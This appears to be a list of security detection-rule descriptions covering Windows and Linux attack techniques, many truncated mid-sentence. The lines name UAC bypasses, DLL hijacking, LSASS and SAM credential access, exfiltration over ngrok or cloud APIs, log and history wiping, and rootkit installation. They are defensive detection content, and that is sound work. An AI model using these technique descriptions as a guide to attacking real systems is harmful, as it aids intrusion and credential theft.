Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o
Detects the pattern of a UAC bypass using Windows Event Viewer
Detects common commands used in Windows webshells
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Detects suspicious malformed user agent strings in proxy logs
Detects default PsExec service filename which indicates PsExec service installation and execution
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi
Detects disabling security tools
Detects NetNTLM downgrade attack
Detects processes loading modules related to PCRE.NET package
Detects processes creating temp files related to PCRE.NET package
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Detects setting proxy configuration
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag
Detects suspicious change of file privileges with chown and chmod commands
Detects source code enumeration that use GET requests by keyword searches in URL strings
Detects suspicious file type dropped by an Exchange component in IIS
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Detects usage of the 'chattr' utility to remove immutable file attribute.
Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th
Detects a suspicious curl process start on linux with set useragent options
Detects enumeration of local network configuration
Detects Bitsadmin connections to IP addresses instead of FQDN names
Detects programs on a Windows system that should not write an archive to disk
Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is
Detects a flashplayer update from an unofficial location
Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea
Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
Detects potential overwriting and deletion of a file using DD.
Detects suspicious user agent strings user by hack tools in proxy logs
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu
Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
Detects events with patterns found in commands used for reconnaissance on linux systems
Detects XSS attempts injected via GET requests in access logs
Detects SSTI attempts sent via GET requests in access logs
Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Detects chmod targeting files in abnormal directory paths.
Detects java process spawning suspicious children
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks
Detects an executable that isn't dropbox but communicates with the Dropbox API
Detects suspicious interactive bash as a parent to rather uncommon child processes
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Detects the usage of the unsafe bpftrace option
Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users
Detects the creation of log files during a TeamViewer remote session
TeamViewer_Desktop.exe is create during install
Detects the creation of a new office macro files on the systems
Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3
Detects the creation of tasks from processes executed from suspicious locations
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in
Ransomware create txt file in the user Desktop
Detects suspicious user agent strings used by crypto miners in proxy logs
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Detects the enumeration of other remote systems.
Detects Octopus Scanner Malware.
Potential adversaries accessing the microphone and webcam in an endpoint.
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
Detects handles requested to SAM registry hive
Detects handle requests and access operations to specific registry keys to calculate the SysKey
Detects Windows PowerShell Web Access
Detects WebDav DownloadCradle
Detects WMI command line event consumers
Detects file writes of WMI script event consumer
Detects process connections to a Monero crypto mining pool
Detects system information discovery commands
Detection of Virtual Appliances through the use of WMI for use of evasion.
Rule to detect DarkEYEv3 encrypted executables (often malware)